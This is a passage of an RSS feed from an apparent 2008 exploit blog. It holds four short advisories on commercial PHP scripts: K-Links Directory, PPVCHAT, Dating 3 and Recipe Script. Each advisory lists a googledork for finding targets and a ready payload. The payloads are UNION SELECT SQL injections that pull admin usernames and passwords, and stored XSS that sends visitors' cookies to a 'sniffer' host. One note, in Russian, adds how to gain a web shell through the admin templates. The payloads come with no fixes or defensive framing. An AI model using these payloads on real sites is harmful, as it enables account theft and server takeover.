<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/secadvis.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/secadvis.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/secadvis.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/secadvis.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/secadvis.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/secadvis.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/secadvis.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/secadvis.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/secadvis.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/secadvis.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/secadvis.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/secadvis.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/secadvis.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/secadvis.wordpress.com/29/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=29&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://secadvis.wordpress.com/2008/09/24/e-topbiz-payment-processor-2-sql-injection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/281ec83eda72c56370d3259a598d4c6d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">secadvis</media:title>
		</media:content>
	</item>
		<item>
		<title>K-Links Directory SQL-INJECTION, XSS</title>
		<link>http://secadvis.wordpress.com/2008/09/24/k-links-directory-sql-injection-xss/</link>
		<comments>http://secadvis.wordpress.com/2008/09/24/k-links-directory-sql-injection-xss/#comments</comments>
		<pubDate>Wed, 24 Sep 2008 14:40:38 +0000</pubDate>
		<dc:creator>Corwin</dc:creator>
				<category><![CDATA[Advisory]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://secadvis.wordpress.com/?p=26</guid>
		<description><![CDATA[Application: K-Links Directory Website: http://turn-k.net/k-links Version: Platinum (All) About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$. Googledork: Powered By K-Links Directory Demo: http://klinksdemo.com Date: 24-07-2008 Description: Множественные SQL-Injection. Активные и пассивные XSS. [ SQL-INJECTION ] http://host/report/-1[SQL] http://host/visit.php?id=-1[SQL] http://host/addreview/-1[SQL] http://host/refer/-1[SQL] ===&#62;&#62;&#62; Exploit: http://host/report/-1 [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=26&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Application: K-Links Directory</p>
<p>Website: http://turn-k.net/k-links</p>
<p>Version: Platinum (All)</p>
<p>About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$.</p>
<p>Googledork: Powered By K-Links Directory</p>
<p>Demo: http://klinksdemo.com</p>
<p>Date: 24-07-2008</p>
<p><span id="more-26"></span></p>
<p>Description:</p>
<p>Множественные SQL-Injection. Активные и пассивные XSS.</p>
<p><span style="color:#800000;">[ SQL-INJECTION ]</span></p>
<p>http://host/report/-1[SQL]</p>
<p>http://host/visit.php?id=-1[SQL]</p>
<p>http://host/addreview/-1[SQL]</p>
<p>http://host/refer/-1[SQL]</p>
<h4><span style="color:#0000ff;">===&gt;&gt;&gt; Exploit:</span></h4>
<p>http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8 from platinum_admins where a_id=1/*</p>
<p>/* Admin Login &#8211;  http://host/admin</p>
<p>Далее, через Manage Templates получаем веб-шелл. */</p>
<p><span style="color:#800000;">[ ACTIVE XSS ]</span></p>
<p>*) На сайте в поиске вбиваем &lt;script&gt;img = new Image(); img.src = &laquo;http://sniffer/sniff.jpg?&raquo;+document.cookie;&lt;/script&gt;</p>
<p>При просмотре администратором поисковых запросов, его cookies уйдут на сторонний ресурс.</p>
<p>*) На любую ссылку можно оставить мнение. После чего это сообщение появится у администратора.</p>
<p><span style="color:#800000;">[ PASSIVE XSS <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ]</span></p>
<p>http://host/index.php?req=login&#038;redirect=&#038;login_message=&lt;script&gt;alert()&lt;/script&gt;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/secadvis.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/secadvis.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/secadvis.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/secadvis.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/secadvis.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/secadvis.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/secadvis.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/secadvis.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/secadvis.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/secadvis.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/secadvis.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/secadvis.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/secadvis.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/secadvis.wordpress.com/26/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=26&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://secadvis.wordpress.com/2008/09/24/k-links-directory-sql-injection-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/281ec83eda72c56370d3259a598d4c6d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">secadvis</media:title>
		</media:content>
	</item>
		<item>
		<title>PPVCHAT ACTIVE XSS</title>
		<link>http://secadvis.wordpress.com/2008/09/24/ppvchat-active-xss/</link>
		<comments>http://secadvis.wordpress.com/2008/09/24/ppvchat-active-xss/#comments</comments>
		<pubDate>Wed, 24 Sep 2008 14:21:25 +0000</pubDate>
		<dc:creator>Corwin</dc:creator>
				<category><![CDATA[Advisory]]></category>
		<category><![CDATA[active xss]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://secadvis.wordpress.com/?p=22</guid>
		<description><![CDATA[Application: PPVCHAT Website: http://ppvchat.com Version: All About: Pay-per-view adult video chat software. Price 999$. Googledork: Copyright © 2006 PPVChat.com Date: 05-07-2008 Description: При регистрации новых пользователей/моделей нет фильтрации полей. ===&#62;&#62;&#62; Exploit: &#60;script&#62;img = new Image(); img.src = &#171;http://sniffer/sniff.jpg?&#187;+document.cookie;&#60;/script&#62;<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=22&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Application: PPVCHAT</p>
<p>Website: http://ppvchat.com</p>
<p>Version: All</p>
<p>About: Pay-per-view adult video chat software. Price 999$.</p>
<p>Googledork: Copyright © 2006 PPVChat.com</p>
<p>Date: 05-07-2008</p>
<p>Description:</p>
<p>При регистрации новых пользователей/моделей нет фильтрации полей.</p>
<h4><span style="color:#0000ff;">===&gt;&gt;&gt; Exploit:</span></h4>
<p>&lt;script&gt;img = new Image(); img.src = &laquo;http://sniffer/sniff.jpg?&raquo;+document.cookie;&lt;/script&gt;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/secadvis.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/secadvis.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/secadvis.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/secadvis.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/secadvis.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/secadvis.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/secadvis.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/secadvis.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/secadvis.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/secadvis.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/secadvis.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/secadvis.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/secadvis.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/secadvis.wordpress.com/22/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=22&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://secadvis.wordpress.com/2008/09/24/ppvchat-active-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/281ec83eda72c56370d3259a598d4c6d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">secadvis</media:title>
		</media:content>
	</item>
		<item>
		<title>Dating 3 PHP Script SQL-INJECTION</title>
		<link>http://secadvis.wordpress.com/2008/09/24/dating-3-php-script-sql-injection/</link>
		<comments>http://secadvis.wordpress.com/2008/09/24/dating-3-php-script-sql-injection/#comments</comments>
		<pubDate>Wed, 24 Sep 2008 06:03:10 +0000</pubDate>
		<dc:creator>Corwin</dc:creator>
				<category><![CDATA[Advisory]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://secadvis.wordpress.com/?p=14</guid>
		<description><![CDATA[Application: E-topbiz Dating 3 PHP Script Website: http://e-topbiz.com/oprema/pages/dating3.php Demo: http://e-topbiz.com/trafficdemos/dating3 Version: 3.0 About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site. Date: 01-08-2008 [ VULNERABLE CODE ] members/mail.php if($action==inbox) { $result=mysql_query("select * from mail where UserTo ='$username' ORDER BY SentDate DESC") or [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=14&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Application: E-topbiz Dating 3 PHP Script</p>
<p>Website: http://e-topbiz.com/oprema/pages/dating3.php</p>
<p>Demo: http://e-topbiz.com/trafficdemos/dating3</p>
<p>Version: 3.0</p>
<p>About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site.</p>
<p>Date: 01-08-2008</p>
<p><span style="color:#ff6600;">[ VULNERABLE CODE ]</span></p>
<p>members/mail.php</p>
<p><code>if($action==inbox) {<br />
$result=mysql_query("select * from mail where UserTo ='$username' ORDER BY SentDate DESC") or die ("cant do it");<br />
if($action==veiw) {<br />
$result=mysql_query("select * from mail where UserTo='$username' and mail_id=$mail_id") or die ("cant do it");</code></p>
<h4><span style="color:#0000ff;">===&gt;&gt;&gt; Exploit:</span></h4>
<p>http://host/members/mail.php?action=veiw&amp;mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/*</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/secadvis.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/secadvis.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/secadvis.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/secadvis.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/secadvis.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/secadvis.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/secadvis.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/secadvis.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/secadvis.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/secadvis.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/secadvis.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/secadvis.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/secadvis.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/secadvis.wordpress.com/14/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=14&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://secadvis.wordpress.com/2008/09/24/dating-3-php-script-sql-injection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/281ec83eda72c56370d3259a598d4c6d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">secadvis</media:title>
		</media:content>
	</item>
		<item>
		<title>Recipe Script SQL-INJECTION</title>
		<link>http://secadvis.wordpress.com/2008/09/24/recipe-script-sql-injection/</link>
		<comments>http://secadvis.wordpress.com/2008/09/24/recipe-script-sql-injection/#comments</comments>
		<pubDate>Wed, 24 Sep 2008 05:19:21 +0000</pubDate>
		<dc:creator>Corwin</dc:creator>
				<category><![CDATA[Advisory]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://secadvis.wordpress.com/?p=4</guid>
		<description><![CDATA[Application: Recipe Script Version: 6.0 Website: http://fivedollarscripts.com Demo: http://recipebag.com Date: 03-08-2008 [ VULNERABLE CODE ] viewrecipe.php $sql="select * from recipe where recipeid=$recid"; $res=mysql_query($sql); $result=mysql_query("select * from recipescomments where approved='Y' and recipeid=$recid"); if(mysql_num_rows($result))do it"); ===&#62;&#62;&#62; Exploit: http://host/blabla-0 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2,3,4,5,6,7,8,9 from recipesadmin.php // Admin Login &#8211; http:/host/admin2<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=4&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Application: Recipe Script</p>
<p>Version: 6.0</p>
<p>Website: http://fivedollarscripts.com</p>
<p>Demo: http://recipebag.com</p>
<p>Date: 03-08-2008</p>
<p><span style="color:#ff6600;">[ VULNERABLE CODE ]</span></p>
<p>viewrecipe.php</p>
<p><code>$sql="select * from recipe where recipeid=$recid";<br />
$res=mysql_query($sql);</code><br />
<code><code>$result=mysql_query("select * from recipescomments where approved='Y' and recipeid=$recid");<br />
if(mysql_num_rows($result))do it");</code></code></p>
<h4><span style="color:#0000ff;">===&gt;&gt;&gt; Exploit:</span><span style="color:#1f0cf2;"> </span></h4>
<p>http://host/blabla-0 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2,3,4,5,6,7,8,9 from recipesadmin.php</p>
<p>// Admin Login &#8211; http:/host/admin2</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/secadvis.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/secadvis.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/secadvis.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/secadvis.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/secadvis.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/secadvis.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/secadvis.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/secadvis.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/secadvis.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/secadvis.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/secadvis.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/secadvis.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/secadvis.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/secadvis.wordpress.com/4/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=secadvis.wordpress.com&amp;blog=4961890&amp;post=4&amp;subd=secadvis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://secadvis.wordpress.com/2008/09/24/recipe-script-sql-injection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/281ec83eda72c56370d3259a598d4c6d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">secadvis</media:title>
		</media:content>
	</item>
	</channel>
</rss>
